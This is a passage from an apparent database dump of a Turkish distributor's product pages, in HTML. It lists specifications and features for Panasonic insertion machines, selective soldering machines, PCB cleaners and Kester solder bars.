45&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Kontrol Sistemi</td>\r\n<td>Microcomputer; AC servomotorlu yarı kapalı &ccedil;evrim kontrol, 10 renkli monit&ouml;r</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Hava Beslemesi ve T&uuml;ketimi</td>\r\n<td>5kg/cm2, 120N&acirc;/dak</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">G&uuml;&ccedil; Beslemesi</td>\r\n<td>AC 3-faz380V 50 Hz</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">&Ccedil;alışma g&uuml;c&uuml;</td>\r\n<td>3.4 KVA</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Makine Boyutları (Boy x En x Y&uuml;kseklik)</td>\r\n<td>4525 x 1831 x 1650mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Ağırlık</td>\r\n<td>2100kg</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><span style=\"font-size: 1.5em;\"></span></p>\r\n<h2 style=\"text-align: left;\">Dizilebilir Komponentler</h2>\r\n<h2 style=\"text-align: left;\">(12.7 mm aralıklı şerit &uuml;zerinde)</h2>\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">K&uuml;&ccedil;&uuml;k Komponentler (LCD:2.5mm);&nbsp;Seramik Kapasit&ouml;rler (&Phi;3-5mm), Elektrolitik Kapasit&ouml;rler (&Phi;3-6.5mm),&nbsp;radyal bacaklı diren&ccedil;ler, vb</li>\r\n<li style=\"text-align: left;\">Standart Komponentler&nbsp;(LCD:5mm);&nbsp;Seramik Kapasit&ouml;r (&Phi;3-&Phi;13mm), Elektrolitik Kapasit&ouml;rler (&Phi;3 - 12.5mm), Film Kapasit&ouml;rler (3W-14W), radyal bacaklı diren&ccedil;ler, transist&ouml;rler (TO-92), vb</li>\r\n<li style=\"text-align: left;\">Diğerleri; LED\'ler, k&uuml;&ccedil;&uuml;k dik diren&ccedil;ler, potansiyometreler, basmalı switchler, ayarlı kapasit&ouml;rler, radyal&nbsp;bobinler, SIP IC\'er, vb</li>\r\n</ul>','RH2','','','','rh2'),(21,'Radyal Dizgi','<h2 style=\"text-align: left;\">Panasonic Radial Insertion Machine - RHIII</h2>\r\n<table border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td><img src=\"images/2el/rh2.jpg\" alt=\"\" width=\"300\" height=\"220\" /></td>\r\n<td><img src=\"images/2el/rh2-arka.jpg\" alt=\"\" width=\"300\" height=\"225\" style=\"font-size: 10px; text-align: start;\" />&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td style=\"font-size: 10px;\">&nbsp;</td>\r\n<td style=\"font-size: 10px;\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3 style=\"text-align: left;\">Genel &Ouml;zellikler</h3>\r\n<ul style=\"text-align: left;\">\r\n<li>\r\n<div class=\"O\"><span>Delik pozisyonlarının kamera sistemi ile tanımlanması</span></div>\r\n</li>\r\n<li><span>62 farklı &ccedil;eşit radyal malzeme i&ccedil;in besleme slotları</span></li>\r\n<li><span>Yaklaşık 0.45 saniye/malzeme dizgi hızı</span></li>\r\n<li><span>Servo motor kontrol sistemi ile daha kararlı ve sessiz &ccedil;alışma</span></li>\r\n<li><span>Kılavuz pin sistemi ile y&uuml;ksek yoğunlukta dizgi ve 0.45 saniye/malzeme hıza ulaşır</span></li>\r\n<li><span>V cut metodu k&uuml;&ccedil;&uuml;k &ccedil;aplı deliklerde dahi daha kararlı bir dizgi sağlar</span></li>\r\n<li><span><span><span><span>Auto Recovery fonksiyonu ile hatalı dizilen malzemenin pozisyonu kamera ile kontrol edilip yeniden&nbsp;</span><span>dizilir. B&ouml;ylece kesintisiz &uuml;retim ve daha az duruş zamanı sağlanır</span></span></span></span></li>\r\n<li><span>2.5 ve 5 mm bacak aralıklı malzemeler 21mm y&uuml;ksekliğe kadar monte edilebilir</span><span>-</span></li>\r\n</ul>\r\n<p class=\"O\" style=\"text-align: left;\"><span>-</span></p>\r\n<table border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<div style=\"text-align: left;\"><img src=\"images/2el/rh2-head.jpg\" alt=\"\" width=\"200\" border=\"0\" /></div>\r\n</td>\r\n<td style=\"text-align: left;\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td><br />\r\n<div style=\"text-align: center;\"><img src=\"images/2el/rh2-komp.jpg\" alt=\"\" width=\"400\" border=\"0\" /></div>\r\n</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: left;\"><br />\r\n<div style=\"text-align: center;\"><img src=\"images/2el/rh2-feeder.jpg\" alt=\"\" width=\"400\" border=\"0\" /></div>\r\n</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<table border=\"0\" id=\"zebra-blue\" dir=\"ltr\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">Makine İsmi</td>\r\n<td>PANASONIC RHIII</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Model İsmi</td>\r\n<td>NM-8224B</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Delik Doğrulama Sistemi</td>\r\n<td>Kamera ile tanıma</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">PCB Boyutları</td>\r\n<td>Kart Boyutları</td>\r\n<td>\r\n<div>330x250mm (max.)</div>\r\n<div>150x80mm (min.)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Dizgi Boyutları</td>\r\n<td>\r\n<div>330x240mm (max.)</div>\r\n<div>150x70mm (min.)</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Kart Kalınlığı</td>\r\n<td>1.6 &plusmn;0.15 mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Dizgi Delik &Ccedil;apı (mm)</td>\r\n<td>0.95&nbsp;&plusmn;0.05</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Yerleştirme Y&ouml;n&uuml;</td>\r\n<td>2 Y&ouml;nl&uuml; 0&deg;, 90&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Giriş (Feeder) Sayısı</td>\r\n<td>62 (Max)</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Dizgi Hızı (sn/malzeme)</td>\r\n<td>0.45 / 0.6 / 0.8</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme G&ouml;vde Boyutu (mm)</td>\r\n<td>&Phi;3 ile <span style=\"font-size: 16px; text-align: left;\">&Phi;</span>13mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Maksimum Malzeme Y&uuml;ksekliği (mm)</td>\r\n<td>21</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Malzeme Bacak Aralığı (mm)</td>\r\n<td>2.5 veya 5.0</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">Kesme vePer&ccedil;inlemeMetodu</td>\r\n<td>Per&ccedil;inleme Bacak&nbsp;Uzunluğu</td>\r\n<td>1.5&nbsp;&plusmn;0.3 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Per&ccedil;inleme A&ccedil;ısı</td>\r\n<td>~15<span style=\"font-size: 16px; text-align: left;\">&deg;</span></td>\r\n</tr>\r\n<tr>\r\n<td>B&uuml;kme A&ccedil;ısı</td>\r\n<td>~35&deg;&nbsp;veya 45&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Kontrol Sistemi</td>\r\n<td>Microcomputer; AC servomotorlu yarı kapalı &ccedil;evrim kontrol, 10 renkli monit&ouml;r</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Hava Beslemesi ve T&uuml;ketimi</td>\r\n<td>5kg/cm2, 120N/dak</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">G&uuml;&ccedil; Beslemesi</td>\r\n<td>AC 3-faz380V 50 Hz</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">&Ccedil;alışma g&uuml;c&uuml;</td>\r\n<td>3.4 KVA</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Makine Boyutları (Boy x En x Y&uuml;kseklik)</td>\r\n<td>4525 x 1831 x 1650mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Ağırlık</td>\r\n<td>2100kg</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<h3 style=\"text-align: left;\"><span style=\"font-size: 12pt;\">Dizilebilir Komponentler</span></h3>\r\n<h3 style=\"text-align: left;\"><span style=\"font-size: 10pt;\">(12.7 mm aralıklı şerit &uuml;zerinde)</span></h3>\r\n<ul>\r\n<li style=\"text-align: left;\">K&uuml;&ccedil;&uuml;k Komponentler (LCD:2.5mm);&nbsp;Seramik Kapasit&ouml;rler (<span style=\"text-align: left;\">&Phi;</span>3-<span style=\"text-align: left;\">&Phi;</span>5mm), Elektrolitik Kapasit&ouml;rler (<span style=\"text-align: left;\">&Phi;</span>3-<span style=\"text-align: left;\">&Phi;</span>6.5mm),&nbsp;radyal bacaklı diren&ccedil;ler, vb</li>\r\n<li style=\"text-align: left;\">Standart Komponentler&nbsp;(LCD:5mm);&nbsp;Seramik Kapasit&ouml;r (<span style=\"text-align: left;\">&Phi;</span>3-<span style=\"text-align: left;\">&Phi;</span>13mm), Elektrolitik Kapasit&ouml;rler (<span style=\"text-align: left;\">&Phi;</span>3-<span style=\"text-align: left;\">&Phi;</span>12.5mm), Film Kapasit&ouml;rler (3W-14W), radyal bacaklı diren&ccedil;ler, transist&ouml;rler (TO-92), vb</li>\r\n<li style=\"text-align: left;\">Diğerleri; LED\'ler, k&uuml;&ccedil;&uuml;k dik diren&ccedil;ler, potansiyometreler, basmalı switchler, ayarlı kapasit&ouml;rler, radyal&nbsp;bobinler, SIP IC\'er, vb</li>\r\n</ul>','RH3','','','','rh2-20'),(60,'Max: 77,000cph / Modular','<h2>Panasonic SMD Machine (Ultra High-Speed)</h2>\r\n<p> </p>\r\n<p>Maksimum Hızı: 77,000cph </p>\r\n<p>Maksimum Hızı: 77,000cph </p>\r\n<p>Maksimum Hızı: 77,000cph </p>\r\n<p>Maksimum Hızı: 77,000cph </p>\r\n<p>Maksimum Hızı: 77,000cph </p>\r\n<p> </p>','NPM-D3A','','','','npm-d3a'),(22,'Jumper Wire Insertion','<h2 style=\"text-align: left;\">Panasonic Jumper Wire Insertion Machine - JVK</h2>\r\n<table border=\"0\" style=\"float: left;\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td><img src=\"images/2el/jvk.jpg\" alt=\"\" width=\"300\" border=\"0\" /></td>\r\n<td>&nbsp;<img src=\"images/2el/jvk-arka.jpg\" alt=\"\" width=\"300\" style=\"text-align: start;\" border=\"0\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2 style=\"font-weight: normal; text-align: left;\">&nbsp;</h2>\r\n<h3 style=\"text-align: left;\">&nbsp;Genel &Ouml;zellikler</h3>\r\n<ul>\r\n<li>\r\n<p style=\"text-align: left;\">Makaradan gelen 0.6mm &ccedil;apında kısa devre tellerini hızlı ve hatasız şekilde dizer</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>-S&uuml;rekli &ccedil;alışmada 0.2 saniye/kısa devre teli dizgi hızına sahiptir</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>-Offset tanımlama sistemi ile y&uuml;ksek dizgi verimliliği sağlar</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>-AC Servomotorlar ile daha hızlı ve kararlı &ccedil;alışma</p>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<p>-Renkli CRT monit&ouml;r ile kolay operat&ouml;r kullanımı sağlar</p>\r\n</li>\r\n<li>\r\n<p style=\"text-align: left;\">-&nbsp;0&deg;&nbsp;ve 90&deg;&nbsp;iki farklı a&ccedil;ıda dizgi ger&ccedil;ekleştirebilir</p>\r\n</li>\r\n</ul>\r\n<table border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td><img src=\"images/2el/jvk-diagram1.jpg\" alt=\"\" width=\"250\" /></td>\r\n<td><img src=\"images/2el/jvk-diagram2.jpg\" alt=\"\" width=\"250\" /></td>\r\n</tr>\r\n<tr>\r\n<td><img src=\"images/2el/jvk-feed.jpg\" alt=\"\" width=\"250\" height=\"187\" style=\"text-align: left;\" /></td>\r\n<td><img src=\"images/2el/jvk-monitor.jpg\" alt=\"\" width=\"250\" height=\"386\" style=\"text-align: left;\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>&nbsp;</h2>\r\n<table border=\"0\" id=\"zebra-blue\" dir=\"ltr\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">Makine İsmi</td>\r\n<td>PANASONIC JVK</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Model İsmi</td>\r\n<td>NM-2037</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Delik Doğrulama Sistemi</td>\r\n<td>Kamera ile tanıma</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\">PCB Boyutları</td>\r\n<td>Kart Boyutları</td>\r\n<td>508x381mm (max.) 90x60mm (min.)</td>\r\n</tr>\r\n<tr>\r\n<td>Dizgi Boyutları</td>\r\n<td>508x371mm (max.)</td>\r\n</tr>\r\n<tr>\r\n<td>Kart Kalınlığı</td>\r\n<td>1.6 &plusmn;0.15 mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Dizgi Delik &Ccedil;apı (mm)</td>\r\n<td>1.05&nbsp;&plusmn;0.05</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Kısa Devre Teli Kalınlığı</td>\r\n<td>0.6&plusmn;0.02</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >Malzeme Yerleştirme Y&ouml;n&uuml;</td>\r\n<td>2 Y&ouml;ne 0&deg;, 90&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">Besleme Şekli</td>\r\n<td >Yer makarası</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >Dizgi Hızı (sn/malzeme)</td>\r\n<td >0.2 (S&uuml;rekli &ccedil;alışmada)</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >Kısa Devre Teli Bacak Aralığı (mm)</td>\r\n<td>5-31 ayarlanabilir</td>\r\n</tr>\r\n<tr>\r\n<td rowspan=\"3\" width=\"79\" height=\"54\">\r\n<p>Kesme ve</p>\r\n<p>Per&ccedil;inlemeMetodu</p>\r\n</td>\r\n<td >Per&ccedil;inleme BacakUzunluğu</td>\r\n<td>1.5&nbsp;&plusmn;0.3 mm</td>\r\n</tr>\r\n<tr>\r\n<td>Per&ccedil;inleme A&ccedil;ısı</td>\r\n<td >~15&deg;</td>\r\n</tr>\r\n<tr>\r\n<td >B&uuml;kmek A&ccedil;ısı</td>\r\n<td >~35&deg;&nbsp;veya 45&deg;</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >Kontrol Sistemi</td>\r\n<td >Panadac 783A microcomputer; AC servomotorlu&nbsp;yarı kapalı &ccedil;evrim kontrol (6-eksen)</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >Hava Beslemesi ve T&uuml;ketimi</td>\r\n<td>5kg/cm2, 15N&acirc;/dak</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >G&uuml;&ccedil; Beslemesi</td>\r\n<td>AC 3 faz380V 50 Hz</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >&Ccedil;alışma g&uuml;c&uuml;</td>\r\n<td >3KVA</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >Makine Boyutları (Boy x En x Y&uuml;kseklik)</td>\r\n<td >1810 x 1465 x 1350mm</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\" >Ağırlık</td>\r\n<td>1450kg</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;&nbsp;</p>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<p>Yere konulan makaradaki kısa-devre telleri</p>\r\n<p style=\"text-align: left;\">&nbsp;</p>','JVK','','','','jvk'),(23,'PCB Cleaning','<p>&nbsp;</p>\r\n<h5 style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px; text-align: start;\">Full Automatic PCB Cleaning Machines</h5>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p>&nbsp;</p>\r\n<table style=\"font-family: Tahoma, Helvetica, Arial, sans-serif;\" border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\">&nbsp;<img src=\"images/aqueous/Trident_Full_View.jpg\" alt=\"\" /></td>\r\n<td style=\"font-size: 10px;\">\r\n<ul>\r\n<li><strong>Tüm flux artıklarını&nbsp;(reçine, suda çözünen, No-Clean) mükemmel temizler</strong></li>\r\n<li><strong>Elektronik dizgi prosesi için özel olarak dizayn edilmiştir</strong></li>\r\n<li><strong>Askeri, IPC, medikal ve diğer yüksek hassasiyet gerektiren temizlik standartlarını karşılayan temizleme</strong></li>\r\n<li><strong>Focus-Wash temizleme teknolojisiyle yoğun kartlarda dahi&nbsp;mükemmel performans</strong></li>\r\n<li><strong>Hareketli PCB kasası ve asimetrik sprey kolları ile gölgeleme etkisini giderir</strong></li>\r\n<li><strong>Dahili temizlik test sistemi</strong></li>\r\n</ul>\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\"><img src=\"images/aqueous/Trident_tablo_1.jpg\" alt=\"\" width=\"600\" height=\"359\" /></p>\r\n<p style=\"text-align: left;\"><img src=\"images/aqueous/Trident_tablo_2.jpg\" alt=\"\" width=\"600\" height=\"467\" /></p>','Trident','','','','trident'),(24,'Selective Soldering','<h2>ESS-500 Selective Soldering Machine</h2>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<ul style=\"text-align: left;\">\r\n<li>El ile lehimleme prosesinden kurtulmak i&ccedil;in&nbsp;ekonomik &ccedil;&ouml;z&uuml;m&nbsp;</li>\r\n<li>Flux uygulama, &ouml;n ısıtma ve b&ouml;lgesel lehimleme mod&uuml;lleriyle b&uuml;t&uuml;nleşik lehimleme sistemi</li>\r\n<li>&nbsp;\'PhotoScan\' yazılımıyla dakikalar i&ccedil;inde program hazırlama</li>\r\n<li>M&uuml;kemmel hassasiyet ve tekrar edebilirlik&nbsp;</li>\r\n<li>18m/dak eksen hızıyla end&uuml;strideki en hızlı sistemler arasındadır</li>\r\n<li>Değişik komponentler i&ccedil;in geniş nozzle se&ccedil;enekleri</li>\r\n<li>Dahili Siemens S7 dokunmatik ekran paneli ile t&uuml;m fonksiyonların otomatik kontrol&uuml; sağlanır</li>\r\n<li>&Ccedil;iftli sprey nozzle ve fluxer opsiyonu ile &uuml;retim iki katına &ccedil;ıkartılabilir</li>\r\n</ul>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>&nbsp;<img src=\"images/ddm/ESS_kafa-400x476.jpg\" alt=\"\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&lt;tr \"&gt;Maksimum Sıcaklık400<sup>o</sup>C</p>\r\n<table border=\"0\" id=\"zebra-blue\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>MODEL ADI</td>\r\n<td>ESS-500</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum PCB Boyutları</td>\r\n<td>500mm x 500mm</td>\r\n</tr>\r\n<tr>\r\n<td>Lehim Tarafında maks. y&uuml;kseklik</td>\r\n<td>25mm</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum hız</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">6m/dk</td>\r\n</tr>\r\n<tr>\r\n<td>Taşıma a&ccedil;ısı</td>\r\n<td>0 derece</td>\r\n</tr>\r\n<tr>\r\n<td>Pozisyonel hassasiyet</td>\r\n<td>+/-0.1mm</td>\r\n</tr>\r\n<tr>\r\n<td>Flux tank</td>\r\n<td>2L Paslanmaz &ccedil;elik - flux seviyesi monit&ouml;r &ouml;zellikli</td>\r\n</tr>\r\n<tr>\r\n<td>Flux maksimum hız</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">6m/dk</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"192\" height=\"19\">Spray genişliği</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">3mm - 6mm</td>\r\n</tr>\r\n<tr>\r\n<td>&Ouml;n-ısıtma</td>\r\n<td>100% IR - 900W</td>\r\n</tr>\r\n<tr>\r\n<td>Lehimleme mod&uuml;l&uuml;</td>\r\n<td>Nozzle</td>\r\n</tr>\r\n<tr>\r\n<td>En k&uuml;&ccedil;&uuml;k nozzle &ccedil;apı</td>\r\n<td>4mm</td>\r\n</tr>\r\n<tr>\r\n<td>Min. yandaki malzeme mesafi</td>\r\n<td>1.5 - 3mm (nozzle\'a g&ouml;re değişir)</td>\r\n</tr>\r\n<tr>\r\n<td>Lehim kapasitesi</td>\r\n<td>15kg</td>\r\n</tr>\r\n<tr>\r\n<td>Isınma s&uuml;resi</td>\r\n<td>Yaklaşık 45 dk</td>\r\n</tr>\r\n<tr>\r\n<td>Nitrojen</td>\r\n<td>Şişe, tank veya jenerat&ouml;r (lehim banyosu ve pompa &uuml;nitesi &uuml;st&uuml;nde)</td>\r\n</tr>\r\n<tr>\r\n<td>Nitrojen basıncı</td>\r\n<td>2 bar</td>\r\n</tr>\r\n<tr>\r\n<td>Nitrojen t&uuml;ketimi</td>\r\n<td>\r\n<p>0.8 - 1.7 cfm (23-49 litre/dk) - nozzle g&ouml;re değişir</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Hava basıncı</td>\r\n<td>5.5 bar</td>\r\n</tr>\r\n<tr>\r\n<td>Elektriksel</td>\r\n<td>220VAC, tek faz, 15A</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Boyutlar</td>\r\n<td>1440 L x 1250 W x 1400mm H</td>\r\n</tr>\r\n<tr>\r\n<td>Ağırlık</td>\r\n<td>403kg</td>\r\n</tr>\r\n</tbody>\r\n</table>','ESS-500','','','','ess-310'),(25,'Bölgesel Lehimleme','<h2 style=\"text-align: left;\">ESS-310 Selective Soldering Machine</h2>\r\n<ul style=\"text-align: left;\">\r\n<li>El ile lehimleme prosesinden kurtulmak i&ccedil;in&nbsp;ekonomik &ccedil;&ouml;z&uuml;m&nbsp;</li>\r\n<li>Flux uygulama, &ouml;n ısıtma ve b&ouml;lgesel lehimleme mod&uuml;lleriyle b&uuml;t&uuml;nleşik lehimleme sistemi</li>\r\n<li>&nbsp;\'PhotoScan\' yazılımıyla dakikalar i&ccedil;inde program hazırlama</li>\r\n<li>M&uuml;kemmel hassasiyet ve tekrar edebilirlik&nbsp;</li>\r\n<li>18m/dak eksen hızıyla end&uuml;strideki en hızlı sistemler arasındadır</li>\r\n<li>Değişik komponentler i&ccedil;in geniş nozzle se&ccedil;enekleri</li>\r\n<li>Dahili Siemens S7 dokunmatik ekran paneli ile t&uuml;m fonksiyonların otomatik kontrol&uuml; sağlanır</li>\r\n<li>&Ccedil;iftli sprey nozzle ve fluxer opsiyonu ile &uuml;retim iki katına &ccedil;ıkartılabilir</li>\r\n</ul>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>&nbsp;<img src=\"images/ddm/ESS_kafa-400x476.jpg\" alt=\"\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\" id=\"zebra-blue\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>MODEL ADI</td>\r\n<td>ESS-310</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum PCB Boyutları</td>\r\n<td>300mm x 300mm</td>\r\n</tr>\r\n<tr>\r\n<td>Lehim Tarafında maks. y&uuml;kseklik</td>\r\n<td>25mm</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum hız</td>\r\n<td>6m/dk</td>\r\n</tr>\r\n<tr>\r\n<td>Taşıma a&ccedil;ısı</td>\r\n<td>0 derece</td>\r\n</tr>\r\n<tr>\r\n<td>Pozisyonel hassasiyet</td>\r\n<td>+/-0.1mm</td>\r\n</tr>\r\n<tr>\r\n<td>Flux tank</td>\r\n<td>2L Paslanmaz &ccedil;elik - flux seviyesi monit&ouml;r &ouml;zellikli</td>\r\n</tr>\r\n<tr>\r\n<td>Flux maksimum hız</td>\r\n<td>6m/dk</td>\r\n</tr>\r\n<tr>\r\n<td>Spray genişliği</td>\r\n<td>3mm - 6mm</td>\r\n</tr>\r\n<tr>\r\n<td>&Ouml;n-ısıtma</td>\r\n<td>100% IR - 900W</td>\r\n</tr>\r\n<tr>\r\n<td width=\"192\" height=\"19\">Lehimleme mod&uuml;l&uuml;</td>\r\n<td width=\"335\">Nozzle</td>\r\n</tr>\r\n<tr>\r\n<td>En k&uuml;&ccedil;&uuml;k nozzle &ccedil;apı</td>\r\n<td>4mm</td>\r\n</tr>\r\n<tr>\r\n<td>Min. yandaki malzeme mesafi</td>\r\n<td>1.5 - 3mm (nozzle\'a g&ouml;re değişir)</td>\r\n</tr>\r\n<tr>\r\n<td>Lehim kapasitesi</td>\r\n<td>15kg</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum Sıcaklık</td>\r\n<td>400oC</td>\r\n</tr>\r\n<tr>\r\n<td>Isınma s&uuml;resi</td>\r\n<td>Yaklaşık 45 dk</td>\r\n</tr>\r\n<tr>\r\n<td>Nitrojen</td>\r\n<td>Şişe, tank veya jenerat&ouml;r (lehim banyosu ve pompa &uuml;nitesi &uuml;st&uuml;nde)</td>\r\n</tr>\r\n<tr>\r\n<td>Nitrojen basıncı</td>\r\n<td>2 bar</td>\r\n</tr>\r\n<tr>\r\n<td>Nitrojen t&uuml;ketimi</td>\r\n<td>\r\n<p>0.8 - 1.7 cfm (23-49 litre/dk) - nozzle g&ouml;re değişir</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Hava basıncı</td>\r\n<td>5.5 bar</td>\r\n</tr>\r\n<tr>\r\n<td>Elektriksel</td>\r\n<td>220VAC, tek faz, 15A</td>\r\n</tr>\r\n<tr>\r\n<td>Boyutlar</td>\r\n<td>1240 L x 1050 W x 1400mm H</td>\r\n</tr>\r\n<tr>\r\n<td>Ağırlık</td>\r\n<td>354kg</td>\r\n</tr>\r\n</tbody>\r\n</table>','ESS-310','','','','ess-310-24'),(26,'E-BAR SAC305','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER E-BAR&nbsp;SOLDER BAR</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Karmaşık elektronik devreler ve PCB\'ler sadece endüstriyal metaryellerin uyumluluğunu istemezler, bununla birlikte kullanılan alaşımların tamamen metalik oksitlerden arındırılmış olması da gereklidir. KESTER E-Bar\'ın üretiminde sadece en yüksek saflıktaki daha önce işlenmemiş metaller kullanılır. KESTER E-Bar günümüz endüstri standartlarının çok üstünde saflıkta ürünler sunarak, tam metalik devamlılık, gelişmiş akışkanlık ve azaltılmış yüzey gerilimi sağlar.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp; &nbsp;<img src=\"images/kester/kester_sb1.png\" alt=\"\" border=\"0\" />&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_sb_3.png\" alt=\"\" width=\"146\" height=\"76\" border=\"0\" />&nbsp;<img src=\"images/kester/kester_sb_2.png\" alt=\"\" width=\"210\" height=\"102\" border=\"0\" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: 